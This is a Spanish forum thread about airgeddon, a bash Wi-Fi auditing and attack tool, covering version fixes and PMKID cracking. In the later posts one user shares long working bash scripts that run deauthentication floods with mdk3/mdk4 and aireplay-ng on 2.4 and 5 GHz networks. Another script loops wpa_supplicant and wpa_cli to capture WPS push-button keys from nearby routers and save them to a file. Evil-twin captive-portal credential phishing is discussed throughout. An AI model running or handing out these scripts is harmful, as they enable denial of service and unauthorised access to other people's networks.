Publicado por: AntonioJaen en 20-03-2020, 10:36 (Viernes)
A ver si alguien me puede decir si Airgeddon puede crear el portal cautivo en una frecuencia de 5 Ghz.?
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 20-03-2020, 12:21 (Viernes)
@AntonioJaen sí que se puede lanzar el ataque contra una red de 5ghz lo que pasa es que como había tarjetas que daban problemas con ciertos canales creo (así de memoria) que lo que hace airgeddon es lanzar el DoS contra el canal de 5ghz y crear el evil twin en un canal de 2.4ghz ... para la victima es casi transparente. Le va a aparecer igualmente una red abierta (la falsa) independientemente de si es en los 5ghz o no.

@USUARIONUEVO , bajé la iso nueva, la instalé y varias cosas... la primera, vi que la versión de airgeddon que viene es la v10.0 , pero me imagino que estarás preparando la nueva para que lleve esta versión nueva v10.10 . Vi que ya incluíste de base el hostapd-wpe, gracias por ello.

Respecto al error de que se cierra y abre la ventana, ya se porque es... he estado analizando el comando que se lanza y es este:

hcxdumptool -i wlan0mon --enable_status=1 --filterlist=/tmp/target.txt --filtermode=2 -o /tmp/pmkid.pcapng

Y está dando erro con la siguiente salida:
hcxdumptool: option '--filterlist=/root/target.txt' is ambiguous; possibilities: '--filterlist_ap' '--filterlist_client'
hcxdumptool 6.0.0 (C) 2019 by ZeroBeat
usage: hcxdumptool -h for help

Bien, ¿por qué este error no lo he detectado? porque como ya sabéis, yo suelo trabajar de base con Linux Debian based, y en estas distros (Parrot, Kali, etc) la versión de hcxdumptool que viene es la 5.1.7 y se ve que el comando ya no le vale a la nueva versión 6 que usa Wifislax. Por el contrario, el comando hcxpcaptool (que es lo que hay que lanzar después) sí que es la versión 5.3.0 por ahora en todos los sistemas y se comporta igual así que imagino que ahí no hay problema.

Me pondré a ello... intentaré buscar un comando que valga para todas las versiones o si no, detectaré la versión previamente para que funcione bien en todos los casos. Este problema me lo iba a encontrar tarde o temprano en las Debian based cuando se actualizase el paquete, así que gracias... me pondré a trabajar en una versión v10.11 con el hotfix.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 20-03-2020, 22:36 (Viernes)
Descargando la última iso de Wifislax (que si no estoy muy desactualizado es la 2.1-rc1) y haré pruebas... a ver si me funciona a mi o si consigo reproducir el error.

¿Esta lleva ya instalado de base el hostapd-wpe? ¿o sigue haciendo falta instalar el módulo que compilaste en su día? lo digo porque alguien andaba preguntando en un canal de discord el otro día, y les remití aquí y al link del módulo que lo subí a mi mega. Dejo el link por aquí otra vez: https://mega.nz/#!IQgzhIoD!7R_ohvavnKX5IzUlVSI5sx-Xf4kGWuvi8CiLEWn8ghU

Lo dicho, echo un ojo y os digo a ver que puede estar pasando.

Saludos.

lleva todas las dependencias ...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 21-03-2020, 10:44 (Sábado)
Ale, ya está fixeado... he aquí el commit: https://github.com/v1s1t0r1sh3r3/airgeddon/commit/fdf8830c2562de87de25d90ded9c24fa8a00d361

Ahora airgeddon chequea la versión de hcxdumptool y si es menor de la v6 pone los parámetros de una manera y si es la 6 o superior los pone de otra tal y como necesita la tool. Probado en Wifislax y en otras distros y funcionando!!

Los cambios están de momento en la rama dev del github... serán para la futura v10.11, que tardará en salir porque quiero hacer alguna cosilla más... no obstante, si lo quereis probar, ya sabeis... un git clone de la rama de dev y veréis que funciona ok: git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon

Os pido paciencia porque el tema de hacer pasos a "producción" (es decir, de dev a master) lleva su tiempo.... traducciones si hubo cambios en las frases, otros cambios, etc...

@USUARIONUEVO, ya casi espérate a la versión 10.11 para añadirla a Wifislax... pero tú nunca cojas de dev porfa, que luego haré mas cambios y así no hay lios de versiones... siempre de master. Si quieres coger de dev para probar ok... pero para incluir oficialmente... paciencia please... gracias a tod@s!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 21-03-2020, 20:14 (Sábado)
me temia algo del estilo , algun cambio en los argumentos de uso .... lo probare y lo empaquetare como 10.10 a secas ...o 10.10_commit

probado con hcxdumptool-6.0.3 y todo ok , lo unico que veo la version dev es 10.11 asi que lo empaquetare 10.11_commit  , te recomiendo que el paquete para archlinux, lo arregles, puesto que ellos tambien usan version 6.0.X
Título: Re:Script multiuso en bash, airgeddon
Publicado por: sol666 en 21-03-2020, 22:43 (Sábado)
hola,acabo de probarlo y efectivamente obtiene el pmkid y lo guarda en un .txt pero a la hora de ejecutarlo desde el menu de descifrado con aircrack no lo hace, ¿es asi el script, no deberia de pasarle el pmkid al aircrack con el parametro -I?

Ejemplo a mano: aircrack-ng -I 2582a8281bf9d4308d6f5731d0489624*4604baf25693*89acf0e761f4*ed487162465a774bfba60eb603a39f3a -w /diccionario
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 22-03-2020, 02:17 (Domingo)
salu2

-l <file>  : write key to file. Overwrites file.

yo es como hago para pasar pmkid con aircrack-ng
MACXXXX   es la mac del ap
Código: [Seleccionar]
tshark -r $DIRECTORIO/attack.pcap -R "(wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol && wlan.addr==MACXXXX)" -2 -w $DIRECTORIO/$convertido.cap -F pcap
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 22-03-2020, 09:45 (Domingo)
@USUARIONUEVO, casí espérate a meter la 10.11, y no te preocupes que cada versión, cuando llega a master tiene su paquete nuevo (el binario de kali y el de arch), y voy actualizando los repos de parrot, el de AUR de arch, etc...

@SOL666, el txt que sale es para Auditarlo desde el menú de descifrado con hashcat, no es formato para Auditarlo con aircrack. Es simplemente en formato hash para romperlo con hashcat.

Para que se pueda romper con aircrack ha de ser un format .cap, y precisamente estoy ahora modificando airgeddon para incluir en la v10.11 también más cambios... para que por ejemplo si estás capturando un handshake y en lugar del handshake pillas casualmente un pmkid airgeddon también lo detecte y te avise. En ese caso sí que te quedaría un .cap que se puede romper con aircrack, cuando es capturado con airdoump. Y todo ello validado ya que todo lo de pmkid en aircrack es solo para versiones >= 1.4. Os pido paciencia, que estoy trabajando en ello.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: sol666 en 22-03-2020, 10:46 (Domingo)
aircrack tambien lo rompe con el parametro -I a partir de la version 1.6 como he puesto en el ejemplo,solo seria cuestion de pasarle a aircrack lo que hay dentro del archivo .txt

Código: [Seleccionar]
aircrack-ng -I 2582a8281bf9d4308d6f5731d0489624*4604baf25693*89acf0e761f4*ed487162465a774bfba60eb603a39f3a -w /diccionario
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 22-03-2020, 11:28 (Domingo)
Por cierto @dynyly me ha gustado mucho la forma esa de convertir con tshark de la captura del hcxdumptool a formato cap del que entiende aircrack. Lo he probado y funciona muy bien. Es muy posible que en una versión posterior (para la v10.11 ya tengo mucho trabajo)... pero igual para una versión 10.20 no descarto añadirlo y que tras la captura, además de dejarte el formato de hashcat te deje un cap que aircrack entienda... gracias!!!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: sol666 en 22-03-2020, 11:42 (Domingo)
no se,a pesar de tener el driver nvidia instalado no me funciona desde el menu hashcat,pongo una captura

******************** Menú de descifrado WPA/WPA2 offline **********************
BSSID seleccionado: Ninguno
Fichero capturado seleccionado: Ninguno

Selecciona una opción del menú:
---------
0.  Volver al menú de descifrado WPA/WPA2 offline
--------------- (ataques aircrack CPU, no GPU) ---------------
1.  (aircrack) Ataque de diccionario sobre fichero de captura Handshake/PMKID
2.  (aircrack + crunch) Ataque de fuerza bruta sobre fichero de captura Handshake/PMKID
--------------- (ataques hashcat CPU, no GPU) ----------------
3.  (hashcat) Ataque de diccionario sobre fichero de captura Handshake
4.  (hashcat) Ataque de fuerza bruta sobre fichero de captura Handshake
5.  (hashcat) Ataque basado en reglas sobre fichero de captura Handshake
6.  (hashcat) Ataque de diccionario sobre fichero de captura PMKID
7.  (hashcat) Ataque de fuerza bruta sobre fichero de captura PMKID
8.  (hashcat) Ataque basado en reglas sobre fichero de captura PMKID
---------
*Consejo* Descifrando por fuerza bruta, podrían pasar horas, días, semanas o incluso meses hasta conseguirlo dependiendo de la complejidad de la contraseña y de tu velocidad de proceso
---------
> 6

Tienes hashcat instalado (v5.1.0). Cumples con el requisito de versión para realizar el ataque PMKID con hashcat (versión minima v4.2.0). El script puede continuar...
Pulsa la tecla [Enter] para continuar...

Introduce la ruta de un fichero de captura:
> /root/pmkid-6A:D3:F2:C6:9A:E6.txt
La ruta al fichero de captura es válida. El script puede continuar...

El fichero seleccionado tiene un formato válido de hashes PMKID para hashcat
Pulsa la tecla [Enter] para continuar...

Introduce la ruta de un fichero de diccionario:
> /run/media/root/Wifislax64-2.0/root/Desktop/prueba
La ruta al fichero de diccionario es válida. El script puede continuar...

Comenzando descifrado. Una vez empezado, pulse [Ctrl+C] para pararlo...
Pulsa la tecla [Enter] para continuar...
hashcat (v5.1.0) starting...

No devices found/left.

Started: Sun Mar 22 11:33:03 2020
Stopped: Sun Mar 22 11:33:03 2020
Pulsa la tecla [Enter] para continuar...
 
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 22-03-2020, 13:52 (Domingo)
si, pero tu problema no tiene q ver con airgeddon... parece q no te funciona bien hashcat... no tendrás bien puestos los drivers opencl para CPU. Porque el hashcat de airgeddon es para CPU, no para GPU (lo pone bien claro en el menú). Si quieres usar GPU has de hacerlo fuera de airgeddon.

Prueba a usar hashcat desde fuera de airgeddon... con --force -D 1 sería CPU y con --force -D 2 sería GPU. Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 22-03-2020, 20:10 (Domingo)
vale , pues me espero a 10.11 aunque ya habia empaquetado la dev , mejor asi.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 24-03-2020, 20:47 (Martes)
Ale, ya está la v10.11 en master. A por ello! Graciassss...  ^-^

Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: radoman29 en 24-03-2020, 22:50 (Martes)
muchas gracias por tu gran trabajo v1s1t0r

saludos chicos de wifislax  >:( >:( >:( >:( >:( >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 28-03-2020, 17:03 (Sábado)
v1s1t0r, uso wifislax 64 1.1. Tengo airgeddon 10.11 ero cuando me ataco con evil twin mi red de 5 ghz, se monta el ap falso, te conectas, te lleva a la página de autentificacion, pongo la clave y al aceptar da error la pagina falsa y airgeddon tampoco recibe nada. Por que puede ser?
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 29-03-2020, 17:07 (Domingo)
salu2
la verdad no creo que sea capaz de crear el plugin con configuarcion personal
Solo comparto la idea desde la humildad de compartir ideas o conocimientos el de verdad entiende de code es usted Visitor ademas al ser el creador del script sabe por donde es mejor introducir las modificaciones
quizas sea un poco retorcido lo querria explicar o quizas no sepa explicarme yo bien pero lo estoy haciendo en script ...

1 su script ya detecta ifaces 5G y crea ap 5G al parecer pero lo veo un poco no se
 (¿poque no? crear ap en 2G en iface 2G y usar iface 5G para ddoss 5G + wps-cli
 ademas la iface 5G parara Ddoss para verificar si hay cambio canal en caso de cambio procede si no continua )

mi forma de ver las cosas aunque con sus ideas lo haria mucho mejor eso fijo ...
detecta iface 5g y la uso para scan de ap disponibles
muestro solo las redes 2G del scan
Código: [Seleccionar]
cat $DUMP_PATH/captura/dump-02.csv | awk -F "," '$4 < 14 { print  $0 }'
y analizo en captura si hay red 5G del AP seleccionado
Código: [Seleccionar]
busca_AP_5G=$(echo ${Host_MAC:3:11})
cat "$DUMP_PATH/captura/dump-02.csv" | awk ' { printf "  %-25s %-22s %-10s %-10s %-10s\n", $1,$14,$4,$9,$6}' FS=","  | grep -v "$Host_MAC" | grep "$busca_AP_5G"

si hay que proceda a ddos 5G con iface con soporte 5G y meto los AP 5G en blacklist de mdk4
ademas verificar el si hay clientes conectados a ambas bandas clientes para blacklist ;extraer el cliente de mas potencia para tirarle con aireplay-ng
Código: [Seleccionar]
cat $DUMP_PATH/captura/clientes.csv | grep -a $Host_MAC | awk '{ print $4,$1 }' FS="," | grep -a -v 00:00:00:00| grep -v $Host_MAC | awk '{ print $2,$1 }' FS="-"> "$DUMP_PATH/doss/clientes.txt"
echo "$Host_MAC">>$DUMP_PATH/doss/black-list-mdk3.txt
FICHERO_CLIENTES_2G=$DUMP_PATH/doss/clientes.txt
if [ -s $FICHERO_CLIENTES_2G ] ; then  ## -s Verifica si el archivo esta vacio
cat $DUMP_PATH/doss/clientes.txt | cut -d" " -f2>>$DUMP_PATH/doss/black-list-mdk3.txt ## clientes blacklist mdk3
awk '$1 > max { max=$1; linea=$0 }; END { print max, linea }' $DUMP_PATH/doss/clientes.txt >>$DUMP_PATH/doss/aireplay.txt  #Extrae cliente con mas cercano para aireplay-ng
Client_aireplay=$(cat $DUMP_PATH/doss/aireplay.txt | awk '{ print $3}'| grep ".")
echo "ddos clientes ">$DUMP_PATH/doss/ddos2.txt
else  ## No hay clientes el archivo esta vacio
echo "ddos sin clientes ">$DUMP_PATH/doss/ddos1.txt
rm -rf $DUMP_PATH/doss/clientes.txt
fi

if [ -e $DUMP_PATH/captura/si-hay-red-5G.txt ] ; then ## Verifica si hay red 5G
cat $DUMP_PATH/captura/clientes.csv | grep -a $BSSID_5G | awk '{ print $4,$1 }' FS="," | grep -a -v 00:00:00:00| grep -v $BSSID_5G | awk '{ print $2,$1 }' FS="-"> "$DUMP_PATH/doss/clientes-5G.txt"
FICHERO_CLIENTES_5G=$DUMP_PATH/doss/clientes-5G.txt
if [ -s $FICHERO_CLIENTES_5G ] ; then   # -s Verifica si el archivo esta vacio
echo "ddos  clientes 5G">$DUMP_PATH/doss/ddos2-5G.txt
cat $DUMP_PATH/doss/clientes-5G.txt | cut -d" " -f2 >> $DUMP_PATH/doss/black-list-mdk4.txt # clientes 5G blacklist Mdk4
awk '$1 > max { max=$1; linea=$0 }; END { print max, linea }' $DUMP_PATH/doss/clientes-5G.txt >>$DUMP_PATH/doss/aireplay-5G.txt
Client_aireplay_5G=$(cat $DUMP_PATH/doss/aireplay-5G.txt | awk '{ print $3}'| grep ".")
else  ## No hay clientes el archivo esta vacio
echo "ddos sin clientes 5G">$DUMP_PATH/doss/ddos1-5G.txt
rm -rf $DUMP_PATH/doss/clientes-5G.txt
fi
## combina clientes en las blacklists fuerza la no conexion de cliente en ambas bandas
if   [ -e $DUMP_PATH/doss/clientes.txt ] ; then
head $DUMP_PATH/doss/clientes.txt | cut -d" " -f2>> $DUMP_PATH/doss/black-list-mdk4.txt
elif [ -e $DUMP_PATH/doss/clientes-5G.txt ] ; then
head $DUMP_PATH/doss/clientes-5G.txt | cut -d" " -f2 >> $DUMP_PATH/doss/black-list-mdk3.txt
fi
rm -rf $DUMP_PATH/doss/clientes-5G.txt $DUMP_PATH/doss/clientes.txt
fi
  ataqua_doss

-----------
si el router no emite bandas 5G se usara iface igualmente para Ddos 2G  mdk4  y aireplay-ng + wpa_supplicant + wps_cli    capturando  posibles pussh button de los routers de alrededores
pero parando ddos cada x tiempo para verificar posible cambio de canal todo ello con la segunda iface2 code extraido de wps_pbc de Kdctv

   
Código: [Seleccionar]
while true ; do
killall wpa_supplicant dhclient 2>/dev/null
if [ -e $DUMP_PATH/stop-bucle.txt ] ; then
   echo "\t Saliendo" & break & exitmode
fi
wpa_supplicant -c $DUMP_PATH/PBC.conf -D nl80211 -i $iface_2 -B &>$linset_output_device &
sleep 1
wpa_cli -i $iface_2 wps_pbc any &>$linset_output_device
if ( grep -q "network=" $DUMP_PATH/PBC.conf ) ; then
        echo -e $verde$subrayar"\t Key negociation completada!"$rescolor
wpakey=$( grep "psk=" $DUMP_PATH/PBC.conf | cut -d = -f 2 | cut  -c 2- | rev | cut -c 2- | rev )
essid=$( grep "ssid=" $DUMP_PATH/PBC.conf | cut -d = -f 2 | tr -d '"' )
killall wpa_supplicant dhclient &>/dev/null
echo -e $verde"\t Key negociation completed! $wpakey"$rescolor >>/root/Desktop/clave.txt
echo -e $verde"\t WPA Key: $essid"$rescolor>>/root/Desktop/clave.txt
echo -e $verde"\t $essid : $wpakey"$rescolor
rm -rf $DUMP_PATH/PBC.conf
sleep 5
break & matartodo & exitmode
fi
sleep 120 &>$linset_output_device
done

   
y el ddoss en bucle parando cada x tiempo y verificando posible cambio de canal y procediendo si hay cambio o no
Código: [Seleccionar]
function ataqua_doss {
while true ; do
kill $mdk3PID &>$linset_output_device
kill $aireplayPID &>$linset_output_device
killall aireplay-ng &> $linset_output_device
killall mdk3 &> $linset_output_device
kill $mdk4PID &>$linset_output_device
kill $aireplay_5G_PID &>$linset_output_device
killall mdk4 &> $linset_output_device
if [ -e $DUMP_PATH/stop-bucle.txt ] ; then
   echo "   Saliendo" & break
fi

if [ -e $DUMP_PATH/doss/ddos1.txt ] ; then
#iwconfig $WIFI_MONITOR channel $Host_CHAN
xterm $HOLD -bg "#000000" -fg "#FF0009" -title "MDK3" -geometry ${g4_bottomright_window} -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/doss/black-list-mdk3.txt -c $Host_CHAN -s 1024&
mdk3PID=$!

xterm $HOLD -bg black -fg red -geometry ${g4_middleleft_window} -T "Aireplay 2G" -e aireplay-ng -0 0 -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
aireplayPID=$!
elif [ -e $DUMP_PATH/doss/ddos2.txt ] ; then
#iwconfig $WIFI_MONITOR channel $Host_CHAN
xterm $HOLD -bg "#000000" -fg "#FF0009" -title "MDK3" -geometry ${g4_bottomright_window} -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/doss/black-list-mdk3.txt -c $Host_CHAN -s 1024&
mdk3PID=$!

xterm $HOLD -bg black -fg red -geometry ${g4_middleleft_window} -title "Aireplay 2G" -e aireplay-ng -0 0 -a $Host_MAC -c $Client_aireplay --ignore-negative-one $WIFI_MONITOR &
aireplayPID=$!
fi

if [ -e $DUMP_PATH/captura/si-hay-red-5G.txt ] ; then  ############# Verfifica si hay red 5G a ataquar
if [ -e $DUMP_PATH/doss/ddos1-5G.txt ] ; then
#iwconfig ${iface_2}mon channel $CANAL_5G
xterm $HOLD -bg black -fg red -geometry ${g4_middleright_window} -title "MDK4" -e mdk4 ${iface_2}mon d -c ${CANAL_5G} -b $DUMP_PATH/doss/black-list-mdk4.txt -s 1024 -x &
mdk4PID=$!
xterm $HOLD -bg black -fg red -geometry ${g4_topleft_window} -title "Aireplay 5G" -e aireplay-ng -0 0 -a ${BSSID_5G} --ignore-negative-one ${iface_2}mon &
aireplay_5G_PID=$!

elif [ -e $DUMP_PATH/doss/ddos2-5G.txt ] ; then
#iwconfig ${iface_2}mon channel $CANAL_5G
xterm $HOLD -bg black -fg red -geometry ${g4_middleright_window} -title "MDK4" -e mdk4 ${iface_2}mon d -c ${CANAL_5G} -b $DUMP_PATH/doss/black-list-mdk4.txt -s 1024 &
mdk4PID=$!

xterm $HOLD -bg black -fg red -geometry ${g4_topleft_window} -title "Aireplay 5G" -e aireplay-ng -0 0 -a ${BSSID_5G} -c $Client_aireplay_5G --ignore-negative-one ${iface_2}mon &
aireplay_5G_PID=$!
fi
else   #### si no hay Red 5G usa iface2 para Ddoss Mdk4 + Aireplay-ng
if [ -e $DUMP_PATH/doss/ddos1.txt ] ; then
xterm $HOLD -bg "#000000" -fg "#FF0009" -title "MDK4" -geometry ${g4_bottomright_window} -e mdk4 ${iface_2}mon d -b $DUMP_PATH/doss/black-list-mdk3.txt -c $Host_CHAN -s 1024&
mdk4PID=$!

xterm $HOLD -bg black -fg red -geometry ${g4_middleleft_window} -T "Aireplay 2G" -e aireplay-ng -0 0 -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
aireplay_5G_PID=$!
elif [ -e $DUMP_PATH/doss/ddos2.txt ] ; then
xterm $HOLD -bg "#000000" -fg "#FF0009" -title "MDK4" -geometry ${g4_bottomright_window} -e mdk4 ${iface_2}mon d -b $DUMP_PATH/doss/black-list-mdk3.txt -c $Host_CHAN -s 1024&
mdk4PID=$!

xterm $HOLD -bg black -fg red -geometry ${g4_middleleft_window} -title "Aireplay 2G" -e aireplay-ng -0 0 -a $Host_MAC -c $Client_aireplay --ignore-negative-one ${iface_2}mon &
aireplay_5G_PID=$!
fi
fi
Verifica_fallo_hostapd="hostapd"   ############# Detiene el script si hay fallos con hostapd
if pgrep -x "$Verifica_fallo_hostapd" &>$linset_output_device ;then
echo "OK"
else
conditional_clear
mostrarheader
echo -e $rojo"Hay problemas con Hostapd quizas la interface no sea compatible"
echo -e "Deteniendo el Ataque y saliendo"$rescolor
sleep 5
break & matartodo & exitmode
fi
espera_para & sleep ${seconde} &>$linset_output_device ############# vuelve a menu y duerme el tiempo introducido

#### Mata procesos de ddos y crea directorio de checkap
kill $mdk3PID &>$linset_output_device
kill $aireplayPID &>$linset_output_device
kill $mdk4PID &>$linset_output_device
kill $aireplay_5G_PID &>$linset_output_device
killall aireplay-ng &> $linset_output_device
killall mdk3 &> $linset_output_device
killall mdk4 &> $linset_output_device
mkdir $DUMP_PATH/checkap
#### Detiene Ddoss y Verifica posible cambio de canal
echo
echo -e $verde$subrayar"\t Deteniendo Ddoss"$rescolor""
echo -e "$amarillo\t Verifificando si hay cambio de canal"$rescolor""
xterm -hold -bg '#000000' -fg '#3A94FF' -title "Verifica Canal" -e airodump-ng --encrypt wpa --band abg -w $DUMP_PATH/checkap/captura ${iface_2}mon -a &> /dev/null &
airodumpPID_5G_PID=$!
sleep 30;
var2=$(cat $DUMP_PATH/checkap/captura-01.kismet.csv  | grep "$Host_MAC" | cut -d";" -f6)
if [ $var2 = $Host_CHAN ] ;then  # Compara variable var2 con numero del canal
Verifica_channel=$(echo -e "\t${verde}$var2 El ap 2G sigue en el mismo canal $Host_CHAN..$rescolor")
kill $airodumpPID_5G_PID
else
unset Host_CHAN
Host_CHAN=$(cat $DUMP_PATH/checkap/captura-01.kismet.csv  | grep "$Host_MAC" | cut -d";" -f6)
Verifica_channel=$(echo -e "\t ${amarillo}$var2 El ap 2G cambio de canal $Host_CHAN...$rescolor")
kill $airodumpPID_5G_PID
fi

if [ -e $DUMP_PATH/captura/si-hay-red-5G.txt ] ; then
var1=$(cat $DUMP_PATH/checkap/captura-01.kismet.csv  | grep "$BSSID_5G" | cut -d";" -f6)
if [ $var1 = $CANAL_5G ] ;then  # Compara variable var1 con numero del canal 5G
Verifica_channel_5G=$(echo "\t ${verde}$var1 El ap 5G sigue en el mismo canal $CANAL_5G...$rescolor")
kill $airodumpPID_5G_PID
else
unset CANAL_5G
kill $airodumpPID_5G_PID
CANAL_5G=$(cat $DUMP_PATH/checkap/captura-01.kismet.csv  | grep "$BSSID_5G" | cut -d";" -f6)
Verifica_channel_5G=$(echo -e "\t ${amarillo}$var1 El ap 5G cambio de canal $CANAL_5G$rescolor")
fi
fi

espera_para &
rm -rf $DUMP_PATH/checkap
done
}

-----------
otra cosa no todas las interfaces son compatibles con hostapd yo tengo una por ejemplo
para que tenga fallo deberia verificar tal fallo y si lo hay parar script en el code anterior lo hace
creo que es algo muy importante ya que si no funciona hostapd ¿ para que continue el script a lo tonto mejor que ejecute salida?

      
Código: [Seleccionar]
Verifica_fallo_hostapd="hostapd"   ############# Detiene el script si hay fallos con hostapd
if pgrep -x "$Verifica_fallo_hostapd" ;then
echo "OK"
else
echo -e $rojo"Hay problemas con Hostapd quizas la interface no sea compatible"
echo -e "Deteniendo el Ataque y saliendo"$rescolor
fi
      
---
todo ello ha sido testado y probado con 2 interfaces
1 interface con soporte bandas 5G
testado y probado
Sabiendo que hay problemas de inyeccion en algunas interfaces con soporte 5G

si quiere code mas completo sin problemas cuando usted quiera ...
pero recuerde que solo es una idea ni recomendacion usted tiene mas conocimento de code que yo
todo ello con humildad y admiracion por su script
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 31-03-2020, 09:50 (Martes)
@AntonioJaen, define "da error la pagina falsa" ... eso es muy genérico... no se lo que puede estar pasando, porque la página del portal es la misma para una red de 2.4 q para una de 5ghz. ¿Solo no te funciona en la de 5?

@dynyly lo que propones es un funcionamiento muy diferente... eso ya sería otro script. airgeddon tiene este funcionamiento que es el que me parece adecuado a mi... que no tiene por qué ser perfecto, pero es el que creo más conveniente. De tu planteamiento no me parece bien que tengas un interfaz de 5ghz y al escanear solo se muestren redes de 2ghz... y luego que al elegir una, se mire si hay esa misma red de 5ghz.... ¿qué pasa si una red solo tiene 5ghz y no tiene 2.4ghz? según tu planteamiento se quedaría fuera y no podrías lanzarle un ataque. También das por hecho que una red tiene el mismo nombre ESSID en 2.4ghz que en 5ghz. Eso es cierto la mayoría de las veces, pero no tiene por qué ser así. Creo que las redes hay que tratarlas completamente por separado como si cada una fuera absolutamente distinta.

Por cierto, eso que llamas ddos, sería más bien dos (a secas). Denial of Service, pero en ningún caso estámos haciendo un Distributed Denial of Service que es una cosa muy distinta.  :D
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 31-03-2020, 18:26 (Martes)
salu2
 quizas no me he explicado bien
lo de la denegacion de servio se entiende aunque no me explique bien
2 interfaces se detecta cual tiene soporte 5ghz
se seleciona automaticamente para scan se muestran solo las 2GHZ rara es la vez que solo sea 5ghz
aumque el nobre cambie no importa se busca por mac   y por lo visto las 5Ghz difieren en la mac  el el ultimo par y primer par de cararcters de mac
Código: [Seleccionar]
busca_AP_5G=$(echo ${Host_MAC:3:11})
cat "$DUMP_PATH/captura/dump-02.csv" | awk ' { printf "  %-25s %-22s %-10s %-10s %-10s\n", $1,$14,$4,$9,$6}' FS=","  | grep -v "$Host_MAC" | grep "$busca_AP_5G"
lo dicho busco mac si los 2 caracterts primeros ni los 2 ultimos aunque cambien el nombre a maria antonia de hecho tambiuen te mostrara la famosa oculta 5G que tienen  los routers de mifibra para la blacklist de md4 ya que es el mismo router y mismo canal  (funciona testado y probado)
------
respecto a usar una iface solo para verficar cambio de canal ni me fijado pero que estas tol dia capturando con airodump-ng 
un desperdicio no usarla almismo tiempo con wpa_supplicant + wpa_cli  capturando posibles pussbutton de router de alrederoes
denegacion de servicio y cada 3 minutos se para denegacion de servicio para verificar con airodump el posible cambio de canal   ( tambien testado )

puedes crear ap en la frecuencia que quiera 2G o 5G ¿pero cuendo haces un  ap 5G tambein haces denegacion a ambas bandas que es lo digo )

ya no digo lo de extraccion de clientes y demas   pero los expuesto es coherente y estoy haciendolo
solo son ideas quizas no sean muy estables
gracias por compartir
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-04-2020, 10:44 (Miércoles)
Efectivamente eso no es muy estable... una tarjeta tiene solo una antena, y no puedes actuar en más de un canal a la vez... así que si estás haciendo operaciones en 2.4 y luego en 5 y vas cambiando para hacer cosas, la otra actividad la dejas "colgada" hasta que vuelvas a ese canal.... por lo que en un ataque evil-twin, si dejas de hacer DoS, los clientes legítimos se van a conectar al AP. No me gusta mucho la idea, lo siento. No obstante, si a ti te funciona, te animo a que hagas un script y lo compartas para que la gente que quiera, lo pueda usar.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 01-04-2020, 13:19 (Miércoles)
salu2
 ;D ;D   cada antena en su canal  ...seria una burrada lo que comentas
perdona si te he molestado no pretendo dar clase
serias tu quiem deberias darmelas pues tienes mas conocimiento
airgedon code fuerte
THANKS
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 01-04-2020, 23:54 (Miércoles)
salu2
perdona no quiero resultar pesao
entiendo que es una pena el sistema de plugins que te has currao y que apenas se use
pero necesitamos que nos muestres algo mas de info  a mi a otros usuarios
y yo pues tampoco quiero morir tonto  ;D
no se si entiendo bien lo de prehook  postkook y demas pero sencillamente si das un poco de luz de como crear la gente se animara y lo vera mas facil

Código: [Seleccionar]
plugin_name="pruebas.sh"
plugin_description="Wpa_supplicant + wps_cli iface2 capture pussbutton"
plugin_author="Only-Crazy"
nonbre que hace y tal y tal  bien
---------

Código: [Seleccionar]
function plugin_template_override_somefunction() {
select_secondary_et_interface
exec_et_captive_portal_attack
}
Las funciones que se usaran para llamar a que se ejecute lo deseado
---------

Código: [Seleccionar]
function my_super_pr0_plugin_prehook_supplicant {
select_secondary_et_interface
echo "ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1" >> "/tmp/supplicant.conf"
}
cuando se ejecute la funcion select_secondary_et_interface  para pursuit_mode  guarde configuracion en /tmp/
------------

Código: [Seleccionar]
function my_super_pr0_plugin_posthook_supplicant() {
exec_et_captive_portal_attack

while true ; do
wpa_supplicant -c /tmp/supplicant.conf -D nl80211 -i ${secondary_wifi_interface} -B 2>/dev/null &
sleep 1
wpa_cli -i ${secondary_wifi_interface} wps_pbc any 2>/dev/null
if ( grep -q "network=" /tmp/supplicant.conf ) ; then
        echo -e "\t Key negociation completada!"
wpakey=$( grep "psk=" /tmp/supplicant.conf | cut -d = -f 2 | cut  -c 2- | rev | cut -c 2- | rev )
essid=$( grep "ssid=" /tmp/supplicant.conf | cut -d = -f 2 | tr -d '"' )
killall wpa_supplicant dhclient &>/dev/null
echo -e "\t Key negociation completed! $wpakey" >>/root/Desktop/clave.txt
echo -e "\t WPA Key: $essid"$rescolor>>/root/Desktop/clave.txt
echo -e "\t $essid : $wpakey"
rm -rf /tmp/supplicant.conf
sleep 5
exit
fi
sleep 120 2>/dev/null
done
}

que se ejecute cuando se inicie al AP  o la funcion exec_et_captive_portal_attack

como lo harias porfa si lo haces o das mas info te lo pillariamos a la primera yo y fijo mas usuarios pues es simple parece ¿lo que quiero hacer eso creo  ;D
un bucle en segunda iface que cada 120 segundos reinicie suplicant creo que lo soportaria bien la segunda iface

